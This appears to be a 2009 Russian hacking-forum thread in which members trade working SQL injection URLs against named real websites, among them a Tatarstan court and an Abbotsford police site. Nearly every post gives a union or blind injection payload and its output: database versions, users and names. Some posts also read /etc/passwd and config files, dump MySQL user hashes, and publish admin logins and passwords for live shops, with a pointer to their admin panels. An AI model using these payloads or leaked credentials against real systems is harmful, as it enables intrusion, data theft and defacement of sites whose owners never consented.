SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.amazighworld.org/news/index_show.php?id=-1+union+select+1,concat_ ws(0 x3a,version(),database(),user( )),3,4,5,6,7,8,9,10,11,12,13,14,15--
    Database Version : 4.0.24_Debian
    Database name : amazighworld_org
    User name : amazighworld_org@localhost
     
  2. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    kusa.ca PR5
    Code:
    http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/*
    DBVer:4.1.20
    User: root@localhost << Вот это я вообще не ожидал увидить, но это ладно! =) самое интересное еще впереди!!
    DBName:desar01_cms

    Работает чтение файлов...
    /etc/passwd
    Code:
    http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/passwd'),5,6,7,8,9,10,11,12,13/*
    /etc/httpd/conf/httpd.conf(от сюда видно, что кроме уязвимого есть на этом сервере еще несколько сайтов)
    Code:
    http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/httpd/conf/httpd.conf'),5,6,7,8,9,10,11,12,13/*
    Теперь посмотрим что за пользователи...
    Code:
    http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13+FROM+mysql.user/*
    И тут оказывается что на root вообще нет пароля =))) Этому я нашел подтверждение, прочитав конфиг от местного форума:
    Code:
    http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('/var/www/vs/forums.kusa.ca/Settings.php'),5,6,7,8,9,10,11,12,13/*
    =)
     
    2 people like this.
  3. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://emap.fm/ondemandpart.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),use r()),5,6, 7,8,9,10,11--
    Database Version : 5.0.32 - Debian
    Database name : emapfm
    User name : emapfm@localhost


    Code:
    http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws( 0x3a,version(),database (),user()),13,14--
    Database Version : 5.0.67
    Database name : cms_admin
    User name : root@localhost


    берём админа:

    Code:
    http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws(0 x3a,user,password ),13,14+from+my sql.user+limit+0,1--
    root:*31ECFA8D11EDEEB33BF4045DB0D8E5E158FD4A84 - пасс не расшифровал :(
     
    1 person likes this.
  4. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    Code:
    http://sterlitamak.ru/arxnews.shtml?id=-880+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10/*
    version: 4.0.24_Debian-10sarge2-log
    user:adminstr@localhost
    database:adminstr
     
    1 person likes this.
  5. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    tatsud.ru ВЕРХОВНЫЙ СУД РЕСПУБЛИКИ ТАТАРСТАН=)))

    юзер - tatsud@localhost
    БД - BDSUD
    версия MySQL - 5.0.66a

    P.s. дальше копаться совесть не позволила=))
     
    1 person likes this.
  6. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    abbypd.ca - PR5 - ABBOTSFORD POLICE DEPARTMENT =))) звоним 911 =)
    MySQL Ver: 4.1.22
    Code:
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(version(),1,1)))=52  ->  4(ветка)
    Я провел до конца брут и выяснил какой же точно версии...
    User : apd@localhost
    Code:
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),1,1)))=97   -> a
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),2,1)))=112  -> p
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),3,1)))=100  -> d
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),4,1)))=64   -> @
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),5,1)))=108  -> l
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),6,1)))=111  -> o
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),7,1)))=99   -> c
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),8,1)))=97   -> a
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),9,1)))=108  -> l
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),10,1)))=104 -> h
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),11,1)))=111 -> o
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),12,1)))=115 -> s
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),13,1)))=116 -> t
    DB : hh_apd
    Code:
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),1,1)))=104  -> h
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),2,1)))=104  -> h
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),3,1)))=95	  -> _
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),4,1)))=97   -> a
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),5,1)))=112  -> p
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),6,1)))=100  -> d
    Еще один клиент... на том же хостинге.. =\
    tourismabbotsford.ca - PR5
    Уязвимость в:
    Code:
    http://www.tourismabbotsford.ca/index.php?page_id=291
    MySQL Ver: 4.1.22
    User : tourism@localhost
    DB : hh_tourism
     
    #7666 Kraneg, 9 Feb 2009
    Last edited: 9 Feb 2009
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.tv.myzone.ro/index.php?mid=13[SQL]


    Version :5.0.45-log
    Database: avatarul_tvmyzone
    User: [email protected]




    blind sql...bruted
     
  8. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),1,1))=102 f

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),2,1))=116 t

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),3,1))=101 e

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),4,1))=64 @

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),5,1))=49 1

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),6,1))=57 9

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),7,1))=50 2

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),8,1))=46 .

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),9,1))=49 1

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),10,1))=54 6

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),11,1))=56 8

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),12,1))=46 .

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),13,1))=49 1

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),14,1))=46 .

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),15,1))=51 3

    [email protected]


    ***********************​


    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1,1))=53 5

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2,1))=46 .

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),3,1))=48 2

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),4,1))=46 1

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),5,1))=50 2

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),6,1))=50 2

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),7,1))=45 -

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),8,1))=68 D

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),9,1))=101 e

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),10,1))=98 b

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),11,1))=105 i

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),12,1))=97 a

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),13,1))=110 n

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),14,1))=95 _

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),15,1))=48 0

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),16,1))=117 u

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),17,1))=98 b

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),18,1))=117 u

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),19,1))=110 n

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),20,1))=116 t

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),21,1))=117 u

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),22,1))=54 6


    5.2122
    PS надоело)
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.bmxmagazin.ro/index.php?ref=2&categ1=-33+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7--



    Database Version: 5.0.75-log
    Database name: bmxmagazin_website
    User name: bmxmagazin@localhost




    всё сложнее найти скули в домене ро, но от этого факта мне еще интересне
     
  10. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    вот тебе

    Contemporary Romanian Writers
    Code:
    http://www.romanianwriters.ro/book.php?id=-9+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())--
    user(): romanian_svc@localhost
    database(): romanian_svc 2
    version(): 5.0.67-community
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.starmall.ro/magazin/?c=8&s=-34+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7

    Version : 5.0.67-community
    Database : starmall_db
    User :starmall_star@localhost



    я не говорил невозможно.....
     
  12. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Какой то самопальный двиг(PageRank: 4 тИЦ: 200):
    HTML:
    http://absolutist.ru/admin/generation/gen.game_float.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3A,user(),@@version,database()),22,23,24,25,26,27,28,29,30&pid=-1
    
     
    2 people like this.
  13. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    takafol.ru

    юзер - takafol@localhost
    бд - db_takafol
    версия mysql - 4.0.23-standard
     
    2 people like this.
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.copycomputer.ro/index.php?ref=12&id=237+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15--


    Database Version: 5.0.67-community
    Database name: copycomp_MySql
    User name: copycomp@localhost



    На сегодня все,спокойной ночи всем.
     
    1 person likes this.
  15. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Книжный магазин
    Code:
    http://book.xadi.net/index.php?book=-19475%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11%20--
    version::4.1.22-max
    user::xadinet_xadi@localhost
    database::xadinet_db
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.godwinart.com/two.php?id=-1194+union+select+1,version(),3,4,5,6,7,8--
    5.0.67-community

    немного искусства..
     
    _________________________
  17. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Федеральное Радио

    http://www.federalnewsradio.com/index.php/www.defenselink.mil/mtom/index.php?nid=84&sid=-1433980+union+select+1,version()/*

    version::5.0.32-Debian_7etch5-log
    user::[email protected]
    database::tags
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.ps2modchip.com.br/two.php?flag=noticias&id=-6+union+select+1,version(),3,4,5/*
    4.0.27-locaweb-log

    Code:
    http://www.parceiraagronegocios.com.br/two.php?flag=informativo&id=-2+union+select+1,version(),3--
    5.0.67-community
     
    _________________________
    #7678 yarbabin, 9 Feb 2009
    Last edited: 10 Feb 2009
  19. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    www.pulse-of-reason.ru Сайт какой-то Казанской рок-группы)

    находим таблицу с админами:
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),1,1))='112 = p
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),2,1))='117 = u
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),3,1))='108 = l
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),4,1))='115 = s
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),5,1))='101 = e
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),6,1))='111 = o
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),7,1))='102 = f
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),8,1))='114 = r
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),9,1))='101 = e
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),10,1))='97 = a
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),11,1))='115 = s
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),12,1))='111 = o
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),13,1))='110 = n
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),14,1))='95 = _
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),15,1))='97 = a
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),16,1))='100 = d
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),17,1))='109 = m
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),18,1))='105 = i
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),19,1))='110 = n
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),20,1))='0
    з.ы. имена колонок с паролями и логинами посмотрел в сурсе страницы авторизации админа, очень часто они подходят)

    логин админа:
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),1,1))='97 = a
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),2,1))='100 = d
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),3,1))='109 = m
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),4,1))='105 = i
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),5,1))='110 = n
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),6,1))='0

    пасс админа:
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),1,1))='97 = a
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),2,1))='100 = d
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),3,1))='109 = m
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),4,1))='105 = i
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),5,1))='110 = n
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),6,1))='0

    логин - пасс второго админа: xernya - xernya
     
    1 person likes this.
  20. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Магазин оргтехники 5-я ветка
    Code:
    http://www.05.ru/catalog.php?cid=47 union select 1,concat_ws(0x3a,admin_name,admin_pass),3,4,5,6 FROM admin_users limit 1,1 --
    login:pass
    azim:4z1m


    Ещё один магаз орг техники
    Code:
    http://www.ecopies.ru/showitem.php?itemid=99999+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10+FROM users+--
    админка
    Code:
    http://ecopies.ru/admin/
    login :: pass
    admin :: ke21pud
    можно поглумится ))
     
    #7680 TELO, 10 Feb 2009
    Last edited: 10 Feb 2009
    1 person likes this.
Thread Status:
Not open for further replies.